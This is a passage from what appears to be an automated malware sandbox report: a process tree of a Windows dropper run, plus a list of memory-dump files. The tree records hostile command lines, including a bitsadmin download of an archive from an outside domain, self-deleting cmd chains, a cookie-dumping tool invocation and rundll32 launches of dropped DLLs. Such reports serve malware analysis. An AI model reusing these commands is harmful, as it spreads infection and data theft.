                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4580 /prefetch:8
                                                                                                        8⤵
                                                                                                          PID:3532
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4620 /prefetch:8
                                                                                                          8⤵
                                                                                                            PID:3572
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3032 /prefetch:8
                                                                                                            8⤵
                                                                                                              PID:2348
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4392 /prefetch:8
                                                                                                              8⤵
                                                                                                                PID:1212
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3180 /prefetch:8
                                                                                                                8⤵
                                                                                                                  PID:2548
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4672 /prefetch:8
                                                                                                                  8⤵
                                                                                                                    PID:1468
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3324 /prefetch:8
                                                                                                                    8⤵
                                                                                                                      PID:2916
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
                                                                                                                      8⤵
                                                                                                                        PID:2812
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4628 /prefetch:8
                                                                                                                        8⤵
                                                                                                                          PID:1752
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4228 /prefetch:8
                                                                                                                          8⤵
                                                                                                                            PID:796
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3884 /prefetch:8
                                                                                                                            8⤵
                                                                                                                              PID:2672
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4864 /prefetch:8
                                                                                                                              8⤵
                                                                                                                                PID:4008
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:1
                                                                                                                                8⤵
                                                                                                                                  PID:3668
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1228,434531015887064118,249082456373017763,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2500 /prefetch:1
                                                                                                                                  8⤵
                                                                                                                                    PID:2704
                                                                                                                              • C:\Users\Admin\Documents\PggL_B85qF_TbdFPJCP7YI2U.exe
                                                                                                                                "C:\Users\Admin\Documents\PggL_B85qF_TbdFPJCP7YI2U.exe"
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2404
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im PggL_B85qF_TbdFPJCP7YI2U.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\PggL_B85qF_TbdFPJCP7YI2U.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                  7⤵
                                                                                                                                    PID:2672
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      taskkill /im PggL_B85qF_TbdFPJCP7YI2U.exe /f
                                                                                                                                      8⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:1176
                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                      timeout /t 6
                                                                                                                                      8⤵
                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                      PID:2580
                                                                                                                                • C:\Users\Admin\Documents\XDPvAzVc1jLPFbo5gdF5xcas.exe
                                                                                                                                  "C:\Users\Admin\Documents\XDPvAzVc1jLPFbo5gdF5xcas.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:2416
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{doMv-3NJjO-ULr4-llyJR}\99111401797.exe"
                                                                                                                                    7⤵
                                                                                                                                      PID:1068
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\{doMv-3NJjO-ULr4-llyJR}\99111401797.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\{doMv-3NJjO-ULr4-llyJR}\99111401797.exe"
                                                                                                                                        8⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:2396
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\{doMv-3NJjO-ULr4-llyJR}\99111401797.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\{doMv-3NJjO-ULr4-llyJR}\99111401797.exe"
                                                                                                                                          9⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:2656
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1625218414084.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1625218414084.exe"
                                                                                                                                            10⤵
                                                                                                                                              PID:2352
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{doMv-3NJjO-ULr4-llyJR}\97271539352.exe" /mix
                                                                                                                                        7⤵
                                                                                                                                          PID:2632
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{doMv-3NJjO-ULr4-llyJR}\97271539352.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\{doMv-3NJjO-ULr4-llyJR}\97271539352.exe" /mix
                                                                                                                                            8⤵
                                                                                                                                              PID:2124
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "XDPvAzVc1jLPFbo5gdF5xcas.exe" /f & erase "C:\Users\Admin\Documents\XDPvAzVc1jLPFbo5gdF5xcas.exe" & exit
                                                                                                                                            7⤵
                                                                                                                                              PID:2348
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                taskkill /im "XDPvAzVc1jLPFbo5gdF5xcas.exe" /f
                                                                                                                                                8⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:2492
                                                                                                                                          • C:\Users\Admin\Documents\NnIOWgzq53RTziN2G0v4dnoq.exe
                                                                                                                                            "C:\Users\Admin\Documents\NnIOWgzq53RTziN2G0v4dnoq.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            PID:2516
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi4942.tmp\tempfile.ps1"
                                                                                                                                              7⤵
                                                                                                                                                PID:2500
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi4942.tmp\tempfile.ps1"
                                                                                                                                                7⤵
                                                                                                                                                  PID:3332
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi4942.tmp\tempfile.ps1"
                                                                                                                                                  7⤵
                                                                                                                                                    PID:3752
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi4942.tmp\tempfile.ps1"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:3864
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi4942.tmp\tempfile.ps1"
                                                                                                                                                      7⤵
                                                                                                                                                        PID:3944
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi4942.tmp\tempfile.ps1"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:4076
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi4942.tmp\tempfile.ps1"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:2812
                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                            "bitsadmin" /Transfer helper http://marsdevelopmentsftwr.com/data/data.7z C:\zip.7z
                                                                                                                                                            7⤵
                                                                                                                                                            • Download via BitsAdmin
                                                                                                                                                            PID:1808
                                                                                                                                                        • C:\Users\Admin\Documents\cDVjHxppYg2Qru7nCoQRnk3F.exe
                                                                                                                                                          "C:\Users\Admin\Documents\cDVjHxppYg2Qru7nCoQRnk3F.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:2484
                                                                                                                                                          • C:\Users\Admin\Documents\cDVjHxppYg2Qru7nCoQRnk3F.exe
                                                                                                                                                            "{path}"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:3984
                                                                                                                                                          • C:\Users\Admin\Documents\cJJjz0bzq032ktlgIkShIQq1.exe
                                                                                                                                                            "C:\Users\Admin\Documents\cJJjz0bzq032ktlgIkShIQq1.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            PID:2476
                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:2728
                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:2796
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 292
                                                                                                                                                                8⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                PID:2960
                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:2776
                                                                                                                                                              • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                                "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                                                                                                                                                8⤵
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                PID:1012
                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                              PID:2748
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:2948
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:2492
                                                                                                                                                              • C:\Users\Admin\Documents\7Wwpzz4GKaU1XBut4VG14C4v.exe
                                                                                                                                                                "C:\Users\Admin\Documents\7Wwpzz4GKaU1XBut4VG14C4v.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                PID:2464
                                                                                                                                                              • C:\Users\Admin\Documents\j94nXMZPZPxCxF7JkQlc_7ya.exe
                                                                                                                                                                "C:\Users\Admin\Documents\j94nXMZPZPxCxF7JkQlc_7ya.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:2456
                                                                                                                                                                • C:\Users\Admin\Documents\j94nXMZPZPxCxF7JkQlc_7ya.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\j94nXMZPZPxCxF7JkQlc_7ya.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:3140
                                                                                                                                                                • C:\Users\Admin\Documents\eBbiqoqnAfAK3ThQ8uUwKiTZ.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\eBbiqoqnAfAK3ThQ8uUwKiTZ.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:2448
                                                                                                                                                                  • C:\Users\Admin\Documents\eBbiqoqnAfAK3ThQ8uUwKiTZ.exe
                                                                                                                                                                    C:\Users\Admin\Documents\eBbiqoqnAfAK3ThQ8uUwKiTZ.exe
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2868
                                                                                                                                                                • C:\Users\Admin\Documents\9EbfbdG2uDG5T4ttEFHo7P6A.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\9EbfbdG2uDG5T4ttEFHo7P6A.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:2440
                                                                                                                                                                  • C:\Users\Admin\Documents\9EbfbdG2uDG5T4ttEFHo7P6A.exe
                                                                                                                                                                    C:\Users\Admin\Documents\9EbfbdG2uDG5T4ttEFHo7P6A.exe
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2860
                                                                                                                                                                • C:\Users\Admin\Documents\1i_7SMMCdaNH6YBtqAynlbTY.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\1i_7SMMCdaNH6YBtqAynlbTY.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:2428
                                                                                                                                                                • C:\Users\Admin\Documents\nWSe9nTKQS2XaJqkuVpZTv9H.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\nWSe9nTKQS2XaJqkuVpZTv9H.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:2556
                                                                                                                                                                  • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                                    "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    PID:3064
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c arnatic_7.exe
                                                                                                                                                              4⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:1060
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\arnatic_7.exe
                                                                                                                                                                arnatic_7.exe
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:2024
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\arnatic_7.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\arnatic_7.exe
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:1820
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\arnatic_7.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\arnatic_7.exe
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:304
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\arnatic_7.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS0C76FD94\arnatic_7.exe
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  PID:1684
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c arnatic_1.exe
                                                                                                                                                              4⤵
                                                                                                                                                                PID:564
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\9405.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\9405.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:3892

                                                                                                                                                          Network

                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                          Replay Monitor

                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                          Downloads

                                                                                                                                                          • memory/112-200-0x0000000000F80000-0x0000000000F81000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/112-211-0x0000000000390000-0x0000000000391000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/112-208-0x0000000004C20000-0x0000000004C21000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/112-210-0x0000000000530000-0x0000000000571000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            260KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/112-204-0x0000000000250000-0x0000000000251000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/276-221-0x0000000001100000-0x0000000001101000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/276-215-0x0000000000D50000-0x0000000000D51000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/888-175-0x0000000000F40000-0x0000000000FB1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            452KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/888-292-0x0000000000A80000-0x0000000000ACB000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            300KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/888-290-0x0000000002540000-0x00000000025B1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            452KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/888-174-0x00000000009E0000-0x0000000000A2C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            304KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/888-293-0x0000000000B40000-0x0000000000BB0000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            448KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/888-272-0x0000000000A30000-0x0000000000A7C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            304KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/956-192-0x0000000001330000-0x0000000001331000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/956-212-0x00000000004B0000-0x00000000004B1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/956-203-0x0000000000690000-0x0000000000691000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/956-209-0x00000000006E0000-0x00000000006F0000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1012-277-0x00000000021C0000-0x00000000022C1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.0MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1012-291-0x00000000003F0000-0x000000000044C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            368KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1028-172-0x0000000002170000-0x0000000002271000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.0MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1028-173-0x0000000000470000-0x00000000004CD000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            372KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1160-181-0x0000000000400000-0x00000000008F4000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            5.0MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1160-180-0x00000000002C0000-0x00000000002C9000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            36KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1220-220-0x0000000002C20000-0x0000000002C36000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            88KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1652-60-0x00000000754F1000-0x00000000754F3000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1664-160-0x000000001AFA0000-0x000000001AFA2000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1664-159-0x00000000002E0000-0x00000000002E1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1664-157-0x0000000000240000-0x0000000000241000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1664-158-0x0000000000250000-0x000000000026F000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            124KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1664-155-0x0000000000970000-0x0000000000971000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1684-222-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            120KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1684-225-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            120KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1684-227-0x0000000002590000-0x0000000002591000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1812-115-0x0000000000400000-0x000000000051E000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.1MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1812-106-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            572KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1812-100-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            100KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1812-91-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            152KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1812-89-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            572KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1812-102-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            100KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1812-90-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.5MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1812-108-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.5MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1812-104-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            100KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1812-112-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            152KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1812-101-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            100KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1812-92-0x0000000000400000-0x000000000051E000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.1MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1816-177-0x00000000004B0000-0x0000000000521000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            452KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1816-230-0x0000000000270000-0x000000000028B000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            108KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1816-231-0x0000000002E90000-0x0000000002F96000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.0MB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1980-202-0x0000000000600000-0x000000000062E000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            184KB

                                                                                                                                                            Download

                                                                                                                                                          • memory/1980-187-0x0000000000D10000-0x0000000000D11000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                            Download

